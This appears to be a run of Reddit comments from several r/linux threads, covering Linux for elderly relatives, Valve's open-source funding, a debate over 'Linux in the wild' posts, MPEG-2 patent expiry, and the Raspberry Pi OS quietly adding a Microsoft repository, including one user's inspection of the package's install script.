Set up the desktop correctly and it's a perfect option for the less tech savvy!  Put Linux on several of the neighbor's/friend's computers. They were mostly elderly and not computer literate. Had no complaints and I've had a lot fewer requests for support. 

One neighbor (with Linux installed) called and said his son put Windows 10 on his machine and it was confusing. Could I come over and put the other thing back on it that was on there before (Ubuntu with Gnome)
My sister is non-technical.  VERY non-technical.  Her Windows machine was full of malware, slow, and miserable to use.

So I put Linux Mint (MATE) on it and she's been happy with it ever since.  It's been well over a decade, and although she does more than email and word processing, most of what she needs done I can help her get set up by connecting in remotely.  I'd hate to have to try that with Windows.  I live a thousand miles away, so popping in to help isn't often an option.
Linux + SATA SSD turns any old pc blazing fast
All my older family members have Linux as well, especially because one of my uncles couldn’t seem to stay on the reputable porn sites and kept nuking his windows machine every time I would rebuild it.
She's going to be roasting you for not using i3wm by next year.
You are now her 24/7 tech support.
And jut like that, thanks to linux and free software you have become the coolest grandchild of the family
Installed Linux Mint Cinnamon for my grandmother, too!
Works perfectly for her. 

I think she is aware that it is not windows any more :D
Yep. My 77-yr old mum is on KDE neon. Between Firefox and libre office she's sorted.
I've done that too with my grandparents. They have left us now, but I remember installing Linux on their PC and they were happy. It was, if I recall correctly, in 2009/2010...
We just got my grandma a chrome book. Not the same, but I didn't have full control. But I made sure we got chrome book over windows. She was running windows 8 on her old one.
A somewhat locked down Linux is perfect for less tech-savvy users.
I've been trying for years sell the idea to my father in law(and my own father), but they're so super alpha that change gives them rage. 

Ergo "i must buy a new computer".
To Ur grandmother:
#Welcome to Linux!
[deleted]
I installed manjaro on my late grandma's clunker laptop and she used it daily without any issue for zoom and facebook calls.  I even setup a backdoor for myself just in case she needed help and it never came to it.  

No reason for manjaro specifically, outside of the menus for xfce being really similar in function to windows.  

Older people ironically are easier to introduce linux to, because they barely understand computers to begin with, so as long as "it does the thing they expect" they can get by with it.  It's generally the people who grew up with win95 to win7 who have significant issues.

 95% of computer usage by end users is through a browser anyways, and those are the same no matter what underlying operating system is running.
Linux supports both old machines and old people.
"such a fast version of [X-windows](https://wikiless.org/wiki/X_Window_System?lang=en) on it" -->  seems correct to me.
Mint Cinnamon and ZorinOS are amazing options

ZorinOS has a lite version with super minimal spec requirements too

1GHz CPU, 1GB of Ram, and 10GBs of storage

My grandpa can't run a smart phone to save his life but he runs ZorinOS on my old Samsung laptop from 2011 and has no problems
that's super awesome !! please more people supporting Linux like that, stay free 👌👌
Who will update it?
Well all fine and dandy, but you probably should update it for her regularly. Pretty sure she won't herself
Aw so nice, one of my grandmas doesn’t know how to use a computer and thinks tech is evil. 

The another one has so many pictures of her grandkids that everything altogether has around 1TB~900GB, so she needs to use *3 HDs*, her computer is also sloww, I’ve tried to convince her to switch to Linux but she says no 🤷‍♀️
If all you do is browse the web and check emails, any operating system out there will probably be just fine. 

Hell I remember when I got an iPhone I contemplated jail breaking it because I was a bit worried about only being able to install apps from the App Store. So far the only time that’s really been a problem is when I couldn’t find a good “poop time” app. I’ve had iPhones for years now.
Keep spreading the word of Linux
Also helps a lot to not get viruses, and to get around scammers.
Yup. I've told my family elders that I'm happy to do tech support on Linux machines, but that I'm completely lacking any skill with Windows or Mac (even questions like "how to check Gmail" on Windows). Lo and behold, new Linux converts!
Installed Lubuntu on my mom’s ancient laptop and she was so happy :)
I set up Ubuntu for my wife and grandkids to use and they like it just fine.
I had my parents on Arch Linux for years.  Distro didn't matter as they were essentially unable/unwilling to admin any OS so I chose what I preferred to admin.  Mom finally got drawn into the Apple universe unfortunately.
Can I ask as a newb to Linux: what makes it “faster”?
Awesome! My 67 year old mother is using a MacBook from the same era. It has an unsupported OS and several viruses. I’m trying to talk her into Linux, but she’s afraid of anything computer related.
I just did this for my mid-80s folks using some mini PC probably 5 years old and slow as shit in Windows and great on Linux, this is the way.
Just installed mint on my grandfathers computer today, driver issues on windows 10 for some fucking reason
Awww so cute
Lovely ❣
I'm trying to teach my 89 yr old grandmother how computer mice work and she's struggling mightily with it.
Yep, similar stories with several friends & family members here, some of them with hardware dating back 15+ years. (xfce is usually a better choice than cinnamon in such low-spec cases)
I think you've inspired me.  I'm staying with my parents who are complaining about an old laptop running windows 10.  It's an old Celeron with 4gigs of ram.  I thought mint would be too slow.
I use to build custom UI's for elderly clients in my early 20's. I didn't make near enough for the work I was doing but changing some ones life like that is priceless.
My Grandfather ran Linux for some 6 years because I only introduced him to Linux, he never used Computer before. Installed Mint on a used PC, which he started using for emails, browsing and some file management (scanned documents/family pictures). He also loved that he could get all those free software and never had to pay a penny and the computer never had a problem because it was so stable for what he needed. Eventually after the support for that LTS version ended, I moved his system to Endless OS, which I found served him better (as he let my niece/his granddaughter also play games). Unfortunately in last year and a half, his Alzheimer has gotten serious, and his computer use has become non-existent.
"Just a reminder that Linux is a great option for grandparents."

Only if they want to use it AS IS. So for E-Mail and Webbrowsing, it is definitely top. But if they don't know what to google for, when they run into an issue, it will definitely become unpleasant.
I did this many times, I love that it is almost impossible to install shit if you don't know how to use linux.
This is awesome. Thank you for sharing. I am slowly upgrading my family from Windows to Mint. My wife is already enjoying it. My Son and Daughter will be harder sells as they are both gamers. This post has inspired me to upgrade my 74 year old Mom to Mint as well.
Nice. Almost thought you were going to say Pop\_OS or EndlessOS.

That's awesome that she's functional.
Nice job! FWIW, have had my 70-something year old mother running Kubuntu now for 6-7 years. I SSH in to maintain and update it for her. She loves it!
Actually now often comes to situations when Linux distros are far more user friendly than "UX optimized" Windows 10 and 11, that just do more than the end user really want.   
I've heard that sometimes Windows does things that other people can't even explain what they've done or what happened with their computer/OS.
Well done OP, good job! I see you are a person of taste with LM Cinnamon, although I'm partial to the MATE edition ;-)
It is such a wonderful option for her.
I want to be able to convince my family to switch to Linux. My sister lightly considered it after she bought a new laptop that had Windows 11. She was rightfully annoyed/worried that it forced you to make a Microsoft account to install and was asking her if she'd be okay with Windows tracking her app and web usage for targeted ads. 

Unfortunately, that was outweighed by her worries about linux software compatibility and troubleshooting. After watching the LTT linux challenge, I can't even say I blame her.
Linux shines brighter on slower computers. This is where Windows and Mac OS dies.
My brother installed linux on my grandma's PC. A week ago, she called me and asked me to change the os. I asked her why'd she not ask my brother about it? She said that she loves him but he's a fat, angry, self-centered, bullish neckbeard who always seems to be on a power trip.

I cheered her up and installed Windows 11 on it. She has never been happier 🙂
Linux is by far the most stable OS I’ve ever used. I’ve never faced any bugs anywhere while doing my daily tasks.
Dunno, i have 2gig ion based netbook from 2010, inserted an old 128gb SSD, tried many distros before installing a Windows 7, it was the only OS that run decently, all Linux distros were sluggish, even lite ones
I DID THAT TOO. Oh my god. I thought I was the only one. Probably got a thank you as well
I still believe [Chromium OS](https://www.chromium.org/chromium-os) is the best option for such users.
Wholesome ❤️
Wholesome stonks!
I’ve got a similar story for my sister. She only used her PC for Minecraft back then on an ancient Dell Optiplex running Windows XP. Installed Xubuntu on it and it ran great for many more years.
Can you run Linux on bootable usb without any problem?
two weeks from now she's going to be running arch
This seriously works. My mom is old and needs hearing aids kinda person, once was frustrated that a screen shot in a web page tutorial, this screen shot showing a desktop and window directing to click the X button…. 
She could not understand why the “frikkin” thing didn’t work as she clicked the highlighted button within a .png image

Thanked me for installing Linux
Now if you can fix her windows bird feeders you might have something.
My grandma is 91, she likes her ipad because she can pinch and zoom to enlarge the text (she does not see well). The walled garden of IOS is great for her, she can go where she likes but there is little she can do to screw it up. Once it stopped working and I had to fix it for her, she had accidentally enabled airplane mode.
I had my 74 year old grandma on Linux and it worked like a dream. I even got her an SSD for it and she fell in love with it. Most of her games are Facebook based games so I figured to just migrate her browser setting (firefox) and it worked just fine for her.
This post made my day!
My dad is slightly more advanced user as he does the same as your grandma plus some YouTube and Twitter. Installed Mint on his decade old laptop like 3 years ago and he’s never had a problem. It’s way faster and I just go in like twice a year and do a mass update for him with a 2-liner in bash. He’s loved it ever since!
While I will tell anyone that GNU/Linux is and has been a perfectly fine desktop OS with excellent user applications for decades, there is and always has been one caveat: localization. Windows and Mac used to do it a lot better in the nineties and early nillies, but I noticed on recent versions of those OS's that they likely use automated translations now, and they plainly suck at times (speaking only about the Dutch language for Belgium). Sadly, they are now on the same level as GNU/Linux' translations. While I use English on all my machines (as God intended - jk), my mom or dad, who are 70+, would be too confused by a half English / half broken Dutch environment. Still, more power to your gran! Is she ricing yet? :)
My one rant on this is the every changing system int i.e. systemd or upstart and why the fuck  did we ever move away from ./etc/network/interfaces?
Your grandmother (I say grandmother since I use gentoo so I am a higher class citizen) would be even more thankful if you installed gentoo
The content on this sub is absolute trash. Bye.
Antix, MX and PeppermintOS are much faster than Linux Mint.
See except for the recent The Verge interview (see link in the comments) with Valve.

>Griffais  says the company is also directly paying more than 100 open-source  developers to work on the Proton compatibility layer, the  Mesa graphics  driver, and Vulkan, among other tasks like Steam for Linux and  Chromebooks.

This is how Linux gaming has been able to narrow the gap with Windows by investing millions of dollars a year in improvements.

If it wasn't for Valve and Red Hat, the Linux desktop and gaming would be decades behind where it is today.
I could be wrong, but I believe Valve is working with [Blue Systems](https://www.blue-systems.com/) to drive KDE development.

https://ev.kde.org/consultants/
I want more of this "suspend game" stuff. Like a console, it's very very handy as we age and have less time.

Bonus if we somehow get to suspend multiple games in a paused state
Linus Torvalds predicted this long back: "Valve will save Linux desktop"
In professional software engineering we tend to sneer at the idea that you can just throw more money and bodies at a software problem and make it work well but there are just so many gaps in Linux that the existing maintainers know need fixed and even how to fix them but they just don’t have the man-hours to give.

Edit: and drivers, endless drivers to write and improve
That makes some sense, MS is a Valve competitor on video games market but also controls the OS where most Steam games runs.
Fantastic news.  I'm not much of a gamer anymore but this will lead to great side effects for Linux for everybody.
It’s working super well for them too, you have no idea how many games I’ve purchased on Steam because I know I can run them in Linux. It’s been a fun year for both me and my wallet!
Also wlroots and gamescope!
Valve are doing this out of necessity. As Valve can see Microsoft trying to wall in an eco system. Grateful for them doing this though. Choice is good.
Due to the AutoModerator, the link to The Verge article is [here](https://www.theverge.com/23499215/valve-steam-deck-interview-late-2022).
This is why I'm very happy to support the steam deck and valve as a company. It's good to see a massive company like Valve putting value back into the open source ecosystem instead of just leaching off of it.
valve my beloved <3
Really hope they keep pouring more money into KDE. Just the improvements in the last few releases has been amazing (granted, a lot of that was also volunteer work).
> If it wasn't for Valve and Red Hat, the Linux desktop and gaming would be decades behind where it is today.

True, but don't forget the countless developers who have devoted their time to the infrastructure that supports this project over the past decades.  Without Wine, for example, Proton wouldn't exist.   Without Arch (and Debian and Canonical before that) the core OS wouldn't exist.   Without Wayland, without TLS, without the Linux kernel...etc etc.


SteamOS truely stands on the shoulders of giants.


I'm not sure if it's depressing or inspirational that Microsoft has done it all under "one roof".
I think SteamOS3 profits a lot from Gabens Microsoft history and Valve is sort of right that wine is the most stable Software api for linux. A company where the ceo has actual practical knowledge about customers and the products is actually really rare.
BattlePass money goes to open-source.

With the OpenGL will be deprecated, I felt significant changes on Vulkan.
Software freedom! Bazaar, society, forums, mailing lists... THEY USED TO SAY... decades ago. 

:-) Well, it worked! But for the big corporate  money!
❤️valve
I bought a new desktop and installed Arch Linux just to game on! It's interesting to me that there are not one but *two* open-source drivers for AMD cards that are both relatively good, but the Mesa one (not AMDs vlk) seems to be the better of them. I am just tickled every time I turn a game on and it just works; never in my wildest dreams did I think I'd be doing so on Linux.
You forgot about Canonical. They have done a lot for linux too.
Open the FOSSet
Well, looks like Linus was righ 😊.
I want people to look at this and realize this: when they complain about companies "taking" open-source software and crying about "giving back", this is a prime example where they are a driving force to keep development going. And it is not taking anything away from anyone: all users are benefiting from this.

So many people complain what they see as "injustice" without realizing how much there is mutual benefit at play.
Well, Deck sales seem to be good, so even from a cynical perspective this is just the cost of business.
You can't really praise Red Hat for desktop adoption without also praising Canonical. Canonical put desktop Linux back on the map, if they've been dropping the ball lately.
Gabe
fkn based
I'm hoping they start investing in Box86/Box64 development next and make an ARM-based baby Steam Deck

Edit: Downvoted because I want Valve to spread the open source love? Lol...
Doing the neon gods work.
It has come so far, so fast.  I can't wait to see what's next.
This is wonderful to see.
Valve isn't paying them couse they love Linux but they earn money from it, plus they have other benefits over Win..
Well you want things done, you pay.
RedHat? Really?

In what tangible way has RedHat contributed to the usability of the Linux desktop, or even gaming for that matter?
Yes! Screw Windows
Im happy with this. Although it is largely out of their hands, id be more happy if this anti cheat crap could be resolved before my next build
considering valve goal is to curtail windows dominion on pc gaming, valve's business, it doesn't surprise me at all that they are sponsoring development in linux gaming ability.

the best thing is, all of us, windows and linux users gain from this. of course valve could go anti-consumer and just make a partnership with windows. that would be more profitable for them in the short-term, but would be a detriment for all pc gamers.

also i think valve is going for market share that the consoles will leave open when most of them will disappear. console exclusive games are on their way out, because walled game gardens are a detriment for game producers, it limits the possible consumers of their product.
do you mean, a 100K?
i hate windows so much lately i would pay to use linux
Keep everything but let them trash the proton part and use the money to finance Godot instead.
Just very loose connected to this, but until today we don't have a source 2 version of Left4Dead2...
I personally think valve has done damage to the free world. They have brought proprietary games and DRM to a os that was suppose to be free by design.


I know many people could care less about the the free world but I personally think that free software is really important to free society.
I "invest" in GE too, I like to think my 5$ a month are helping. Just behind Red hat.
This is great to hear... Anti cheats is an obstacle at the moment. I reinstalled Windblows on my PC in order to Play COD MW2 with my son, brother and friends.

"I found Linux running on my printer"
My guess is a lot of people here are young hobbyists, and not professionals. Once you get into the working world and you work with Linux, you know how pervasive and unremarkable it is.
It's like /r/mildlyinteresting with its posts about banana peel floor signs, or double yolk eggs
On a semi-related note, why is /r/linuxinthewild set to private?
[deleted]
[deleted]
I found Linux running on this weird bump in the back of my neck!
I found Linux running on this laptop... That I installed it on.. 
I don't mind them, it's a reminder that even though nobody ever much sees Linux, it's still there, and usually rebooting/panicking/being idle.

How about a filter for those who cannot scroll past them?
Same for ATMs and other commonly Linux based devices? Linux desktop environment on Nintendo switch or something else you wouldn't immediately expect? Yes please. 
All toilets in 2030 run on Linux. Smart Toilets are coming people. #ImFromTheFuture
It is nothing special to those of us who have been around Linux for a long time. For someone who has just gotten into the community, it is a really exciting thing. Be excited with them. 
might as well ban "linux changed my life" posts as well. "I put linux on my 5 year old laptop, and now it runs like it's brand new!"
Maybe implement a flair system, so we could filter out all the "Linux in the wild" shitposts without actually banning them.
Heck, at this point I'm more amazed by seeing Windows XP on ad displays which were put up *last year.*
If people really didn't want that content wouldn't they just be downvoted into oblivion?  Seems kind of harsh...
Given that so many people grow up with Windows, it might be an eye opener to people who are not otherwise aware of Linux. Then, is /r/linux an Linux old boys club or is there interest in pulling in more people who might not know about Linux but could benefit from using it?
I was working with FEMA, and we used linux when the levies broke. 


How dare you.
"I found Linux running..." was a thing when Linux was still the underdog OS. It's about time it's retired because Linux is used everywhere now.

I agree wholeheartedly with OP.
It really is like saying, "This website is running on Linux." Linux is ubiquitous. 
Let's make a distro called Snakes and market it to airline companies. Then we'll be flooded with "I saw Snakes on a plane!" posts...
You don’t get it. I found it. I’m special. Right?
TIL linux runs on virtually all plane's entertainment system
No doubt.

If this is going to be place where people post pics of things running linux then why not post a picture of every Android device made?
I am a cranky neckbeard.  Ban everything!
Can we ban whining posts asking to ban stuff?
I found Linux running on my embedded Linux device.
The truth of the matter is that *nix is used in damn near everything that isn't an end-user or consumer PC. Windows is basically useless for any kind of real work where reliability is paramount.
Can we just ban all "I found linux running here!" posts? It's annoying and low effort. Linux is popular for a ton of use cases, we get it.
Hey guys, I found Linux running on my raspberry pi. Super crazy, I can't believe it.
The fact so many people find Linux running on a plane isn't a good thing to say actually as it shows that it isn't stable causing the terminals to crash and reboot.
Aww... i found Linux running in my datacenter.
Weird, I saw Linux sitting...
One time I was in a train and the monitor shuts down and reboots, you can see the BIOS, and one man gets up to have a better look at it and his wife asks him "what's up?" and he replies "Oh, nothing, it's just Ubuntu".
I installed Linux (Mint Cinnamon) on a dead weasel and it came back to life.
"I found Linux running in my Linux"
I found Linux running on my Linux. Pls halp.
I found Linux running inside of Linux running inside of Linux running inside of Linux. 

I have broken my virtual machine. 
Alternatively, people who don't realize how important and pervasive linux is might get some enlightenment from these types of posts, no? I personally like to see them and I already understand Linux's importance.
right, despite the usual rabble on here, I'm generally curious, were they running a special distro, some sort of rdp/x11 desktop sharing, or anything else noticeable??
Can we please ban complaining about posts on a site where downvotes = group consensus of what is and isn't acceptable? /s
No.

Let people appreciate the small things in life that make it worth living.

I used to be impressed by casual things like planes flying over me and shooting stars then i became an old fart like you and happiness is much harder to find now, everything is boring.

Don't impose your unhappiness onto the innocent souls.
OP, you might want to read this: https://xkcd.com/1053/
Why marginalize someone's enthusiasm? We're all here: newcomers and long haul folks, and as newcomers come on, I would hope they would be fascinated to see this. 

The opposite would be to make this sub catered to only experts. That's essentially what banning posts like this would be.

Imagine seeing it on a plane for the first time and thinking of our community first. Imagine what they would feel when they learn that we're not interested. Also consider how easy these posts are to ignore, which makes everyone win. 
I’m guilty of this.  Come at me. 
But have you found Linux running in your heart?
Ban? OMG just scroll and stop crying 
[deleted]
Who crapped in your corn flakes?
Thanks for the gatekeeping.  Is there anything else we should get your permission before talking about?
[deleted]
no
Banning things that you don’t find interesting is kind of weird
hopefully it will be running on everything soon enough
YES!!

It get frustrating to see over and over again. Reminds me too much of omg!ubuntu with their shitty "zomg ubuntu in the wild!!!!" posts.

Enough!!!!
\> "stop posting things I find annoying"

ok
Instead of completely scrubbing these posts, can we just raise the bar a bit? Post if your aeroplane entertainment system is running Linux **and** you root it.
Posts like these only encourage more of it.
Because it's still kinda cool to note how often it's actually used vs windows when the general population don't even know what the hell it is
Someone in the not too distant future will cite this as one of those "Why is the Linux community so unwelcoming?" kind of posts. Then a few hundred more comments will be in that post.
While I might agree with the main point of this post, I also think it is important to broadcast the all-around importance of the Linux kernel. 

While the work world may "run on Windows", everything else, including supercomputers, use Linux. 

Edit 1: format

And not just plane entertainment systems. Linux runs on so much crap it's actually more reasonable now to post stuff it *doesn't* run on.
And it's going to run on an Atari Box soon
I didn't know this was a thing. Next time I go to work I'll post our grills booting up so you can see Tux there, or maybe our credit card readers so you can see Tux there.

Linux is pretty damn ubiquitous, just not as much in personal computing.
We run Linux to test entertainment systems on airplanes and while I never seen one actually accessed passed test screens, one system runs some sort of Android OS, the others I assumed were proprietary software.
Docker in the cloud: Linux containers running on Linux VMs running on Linux hosts. 
Last plane I took had an entertainment system based on Android.
I found Linux running on my server! Who woulda thought!
The reason you see that is because nothing “special” happens much in the Linux world. At least certainly not at a daily pace.
it runs on the flight control computers too
While we're at it, why don't we ban all the "Hackers post footage of Nintendo Switch booting Linux" posts too? It's all I've seen for the past week or so.
[removed]
I found Linux on my Debian laptop!
Hmmmmmmmmmmmmmmmmmmm expecting the mods to come and ban all the joke comments. Because consistent action is important. 
I found mini running in my work pc with windows 10
I found Windows on my plane!!

It says Windows MH370 Edition ready, oh wait...
I found Linux running on my brain 
I found MalwareLinux... Am I I? 
I did not find Linux running on a work computer, so I installed it so I could in good faith say I found it running.
I found linux running on my light up sneakers
Wasn't there a Subreddit specifically for this?
In the Army I had a howitzer that ran linux. Is that cool? 
My plane entertainment system is iOS ^^^^^^/s
I found Linux running on my server! Who woulda thought!


I found linux running on my dildo
[I found Linux on an arcade game](https://i.imgur.com/A0f6rlo.jpg)
I just want to see "I got native linux on my phone" posts. :'(
Yeah, I'd consider that more /r/techsupportgore or /r/softwaregore, since the only way you'd tell is if the customized UI/UX crashed.
We should also ban those posts asking for help solving issues with Linux. Everyone had them it's nothing special
The real question is how to root them and copy off all the movies. (Only when you're outside the jurisdiction of any government and therefore copyright law, of course...)
I found Windows running, so I wrote Linux over it.....
Mod here.  I'll allowit
You could just ignore them like a big boy
I can think of way more important things to get worked up about.  You have the option of not clicking of course.
But then this wouldn't display the superiority Linux has over other machines. 
Just downvote it. No need to ban. Those buttons are there for a reason.
In third grade I found Linux running down my pant leg. All the other kids laughed at me.
Interesting way to karmawhore, you managed to circlejerk while pretending to make a meta complaint post based on a recent stream meta posts which talked about a common problem with this sub. This is worth some reddit gold.
I disagree. 

Linux can't be like this nowadays without accepted and accepting anything and literally - (nearly) everything (electronic devices); whether it's an old junks or latest supercomputers. And, therefore, it's surpassed than just being a kernel. 

You want to be the changes? Do It Yourself (aka Linus Torvalds). Do it somewhere else and do not push your wills upon the others.
If it's just a Tux or something that's not interesting. But these posts generally have dmesg output or some other information about software and hardware configurations, which often is.
[deleted]
What does it take away from you?  Not trying to be a dick or repetitive but... how bout just keep scrollin?  It takes nothing out of your day to simply ignore those posts.
I'd just like to interject for moment. What you're refering to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.
Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called Linux, and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.
There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called Linux distributions are really distributions of GNU/Linux!
Lets ban talk of programming sex-robots as they all run Redcore Linux
I found linux running linux!
I found Linux. 
Seeing more and more are moving towards android I'd say be careful what you wish for :)
I found Linux running on YOUR vibrator. bzzz, bzzz, bzzz
Per the [MPEG-LA](
http://www.mpegla.com/main/programs/M2/Pages/PatentList.aspx)

> the last US patent expired February 13, 2018

Linux distros should be able to legally include MPEG-2 decoders and encoders now. Legal decoding of (unencrypted) DVDs should be possible because most DVDs are MPEG-2 and AC3.
It's stupid how long software patents last when technology changes so quickly
[deleted]
Does this mean MPEG2 keys for Raspberry Pi can now be legally shared over the internet?
Is there a reason for the average user to use this format?

Aren't there better standards? (AV1, VP9 )

Does it have better hardware acceleration then newer standards?

Is this a case of "closing the barn after all the horses escaped"?
Hurray, once everyone is on MPEG4
Time to transcode my Linux ISOs again…
So Debian and other "free" distros can now have dvd playing enabled by default?
What does this mean to average person? ELI5? 
Oh, so *that's* why Shaw Broadcast Services is in such a rush to convert everyone from MPEG-2 to MPEG-4.
Rad
So Debian and other "free" distros can now have dvd playing enabled by default?


Hold on a sec. Does this mean I bought my Raspberry Pi license key last week for no reason??
This is again to show how patents are the most useless and greedy invention in the history of mankind.
But nobody really refers to MPEG-2 when they say "mp3" nowadays. The browser uses AAC, Vorbis or Opus.
[deleted]
In a recent update, the Raspberry Pi Foundation installed a Microsoft apt repository on all machines running Raspberry Pi OS (previously known as Raspbian) without the administrator’s knowledge.

Officially it’s because they endorse Microsoft’s IDE (!), but you’ll get it even if you installed from a light image and use your Pi headless without a GUI. This means that every time you do “apt update” on your Pi you are pinging a Microsoft server.

They also install Microsoft’s GPG key used to sign packages from that repository. This can potentially lead to a scenario where an update pulls a dependency from Microsoft’s repo and that package would be automatically trusted by the system.

I switched all my Pi’s to vanilla Debian but there are other alternatives too. Check the /etc/apt/sources.list.d and /etc/apt/trusted.gpg.d folders of your Pi’s and decide for yourself.

**EDIT:** Some additional information. The vscode.list and microsoft.gpg files are created by a postinstall script for a package called raspberrypi-sys-mods, version 20210125, hosted on the Foundation's repository.

Doing an "apt show raspberrypi-sys-mods" lists a GitHub repo as the package's homepage, but the changes weren't published until a few hours ago, almost two weeks after the package was built and hours after people were talking about this issue. Here a comment by a dev admitting the changes weren't pushed to GitHub until today: [https://github.com/RPi-Distro/raspberrypi-sys-mods/issues/41#issuecomment-773220437](https://github.com/RPi-Distro/raspberrypi-sys-mods/issues/41#issuecomment-773220437).

People didn't have a chance to know about the new repo until it was already added to their sources, along with a Microsoft GPG key. Not very transparent to say the least. And in my opinion not how things should be done in the open source world. 
I noticed that this had been posted on the Raspberry Pi forums, but their moderators quickly locked + deleted the topic threads, claiming it was "Microsoft bashing." 

This post ([https://www.raspberrypi.org/forums/viewtopic.php?f=63&t=301011&p=1810728#p1810728](https://www.raspberrypi.org/forums/viewtopic.php?f=63&t=301011&p=1810728#p1810728)) mentioned categorizing the repo as "non-free" and requiring user consent, but was quickly shot down by the moderators. In the context, jamesh and gsh are being rather authoritarian.
Thank you for calling attention to this. A few days ago running apt update on a few Pis I noticed the Microsoft repos and were wondering wtf they were as I was 99% sure I hadn't seen them before.
[deleted]
[deleted]
After I tried [Arch Linux ARM](https://archlinuxarm.org/) I never looked back to Raspbian.

It's super easy to install and you can download almost everything via package manager (this means you can keep everything up to date and avoid installing things with `curl | bash`).

If it ain't in the [repos](https://archlinuxarm.org/packages), it's in the [AUR](https://aur.archlinux.org/packages/)
Others have already identified this as coming from the raspberrypi-sys-mods package. I wanted to see what exactly is happening, so first I tried:

    apt source raspberrypi-sys-mods

But there is no source package available.

    apt info raspberrypi-sys-mods

Shows: Homepage: https://github.com/RPi-Distro/raspberrypi-sys-mods , but that hasn't been updated in Months, so also doesn't include the changes.

Then I just downloaded the .deb itself, and disassembled it:

    mkdir rpi-sys-mods; cd rpi-sys-mods
    wget http://archive.raspberrypi.org/debian/pool/main/r/raspberrypi-sys-mods/raspberrypi-sys-mods_20210125_armhf.deb
    # Unpack the .deb file
    ar -x raspberrypi-sys-mods_20210125_armhf.deb
    # Unpack the control file
    tar xf control.tar.xz

The 'postinst' shell script, which is run after installing/updating the package, contains a new routine 'add_ms_repo()'. It has the Microsoft public key included as a block of text. This is somewhat odd, because this means that both vscode.list, and the microsoft.gpg file, don't end up in the register of installed files that you can query by e.g. dpkg -S.

Note that the package does check whether the vscode.list file already exists, and includes the message that one can 'comment out' the new repository. The file is not overwritten (in this version of the package) if it already exists.

Would have been nice if this had been opt-in, instead of opt-out after the fact.
Fucking corporate billionaires trying to be everywhere even when they don’t belong there.
This is also on my 3 lite installations. I'm mad about this, because I always check what new dependencies are installed. Followed back the log, and can't find anything about this. Even the way it's installed is shady. With a postinstall script, not the usual "extract" method.

I don't know what to think about this. I always trusted the pi foundation with this kind of stuff, but the way they handle this is very bad. Hope it's removed soon.
Thank you very much for bringing this to wider attention. How recent was this? Two weeks ago I put Raspian on an old Pi B+.
Never in my 2 decades of using Debian and Ubuntu has either modified my sources.list without my consent.  What the actual fuck?  I could understand if they just added it to the default installation image, but they had to actually write a script to add this repo to existing installations.  That is shady as fuck!

Also, PLEASE don't ever give Microsoft root access to your system by adding one of their repositories or installing one of their binary packages.  Use VSCodium!
[deleted]
If I remove it from apt sources will it come back?
Just for an electron based text editor? Unacceptable!
I'm sorry but that response from the engineer tells me everything. "This makes it easier for people who use VSCode so it will be staying". That is just not good enough and smacks of Microsoft striking back room deals. Make it optional. The RPF here is making one big fu\*k up imho. You don't force shit on users or the users that built you into what you are will just tell you to fu\*k off. Not sure if I can swear here hence the censorship like what the RPF are doing by not even discussing the matter.
It looks, that this repo is installed via a update from raspberry os. Normally (in other linuxes like ubuntu or fedora), this repo is part of the deb or rpm. So if you install for example vs code, then you get that repo-file (intended for updating vs code in future).
But if you never install vs code, you will never get that repo.

So that decision is weird, it was made by raspberry pi os folks. Ant they have a funny argument:
"Thank you, everyone, for your feedback, this won't be changing because it makes the first experience for people who do want to use tools such as VSCode easier."

Better User Experience - shitty argument, normaly used by sellers of snake oil.
lmao breaking trust when everything about linux is built on trust

best decision ever

I guess microsoft users do not care about trust so that logic is fair
well then, time to write another Ansible role

edit: it looks like it's part of the raspberrypi-sys-mods package that does it.  I'm probably going to mark it 'held' in Apt, after I remove the repo file.  Example:

    root@remotepi1:~# apt-mark hold raspberrypi-sys-mods
    raspberrypi-sys-mods set on hold.

Keep in mind if you use unattended-upgrades, it'll need blocked there too.  I don't, because SD cards don't like a lot of writing
You can always create your own raspbian image using [Pi-Gen](https://github.com/RPi-Distro/pi-gen). I’ve been looking into doing it for a couple projects already.
Should we be looking for this in other distros as well, or does this affect solely Raspian?
Personally, I'm using Ubuntu. Honestly, it runs great.
drink verification can
The issue with this included in Raspbian is precisely the fact that Raspbian is essentially designed for educational purposes. I don't think it was ever intended to be used in any kind of production. I think it makes sense to use a different distribution on your Pi if this bothers you.

Despite this though, I do think it's shitty that it's been added to existing installations. It would be different if it was just added to new installs or flashes.
Question.

This discussion is outraged over the foundation adding Microsoft's repo in a "stealthy" manner. But that could be said about any repo which is added through an upgrade.

The issue isn't "The Foundation shouldn't add a Microsoft repo to apt", it's "Microsoft shouldn't be tracking us whenever rpi reaches out to their servers"

I think this is where privacy laws come into play.

Granted, globally, there are many jurisdictions where tech companies are free to track their users to their hearts content. But the EU, for instance, has the GDPR.

As a EU citizen, you have hard rights. And MS can't just track you without your consent.

The GDPR doesn't just apply to websites and cookies. It applies to any and all forms of capturing personal data in the most broadest way possible. Up to and including your kids local scouts need to adhere to the GDPR if they so much as keep a paper list of contact details.

My point is that if you distrust MS, you ought to exert your rights if you are an EU citizen.

* Ask a dump of any information they have on you.
* Ask them to remove any information they have on you.
* Ask them if they have a consent form somewhere.

I understand that this is an awful hassle. And the foundation really shouldn't have added a repo from an untrusted party in the first place. That much is true.

But I feel it's far more important to exert legal rights because, well, in this world, sadly, that's how the game is played.
Thanks for the heads-up. I REALLY don't want microsoft's crap on any of my machines.
Reddit is proper source for your top quality news.
Terrible, terrible damage

[https://github.com/RPi-Distro/raspberrypi-sys-mods/blob/master/debian/raspberrypi-sys-mods.postinst#L42-L63](https://github.com/RPi-Distro/raspberrypi-sys-mods/blob/master/debian/raspberrypi-sys-mods.postinst#L42-L63)
I just sent this message to the foundation:

>Hello Raspberry Pi Foundation,  
